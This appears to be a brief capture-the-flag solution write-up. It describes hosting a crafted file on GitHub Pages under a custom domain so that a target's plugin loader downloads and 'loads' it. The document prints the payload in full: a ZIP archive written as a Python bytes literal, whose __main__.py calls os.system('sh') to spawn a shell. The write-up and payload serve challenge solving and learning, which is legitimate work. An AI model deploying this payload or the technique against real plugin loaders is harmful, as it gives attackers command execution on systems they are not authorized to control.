The solution is to create a GitHub pages with `index.html` with the following content:

```python
unused = b"PK\x03\x04\n\x00\x00\x00\x00\x00\x1a\xbc\xc2V\x97\xd0\x92\xc7\x1a\x00\x00\x00\x1a\x00\x00\x00\x0b\x00\x1c\x00__main__.pyUT\t\x00\x03#|zd%|zdux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00import os\nos.system('sh')\nPK\x01\x02\x1e\x03\n\x00\x00\x00\x00\x00\x1a\xbc\xc2V\x97\xd0\x92\xc7\x1a\x00\x00\x00\x1a\x00\x00\x00\x0b\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xb4\x81\x00\x00\x00\x00__main__.pyUT\x05\x00\x03#|zdux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00Q\x00\x00\x00_\x00\x00\x00\x00\x00"
```

Then in repo settings, you need to set the following domain:
```
<something>.{blackhat.day,veganrecipes.soy}
```

Then you need to download the plugin from that domain and "load it".
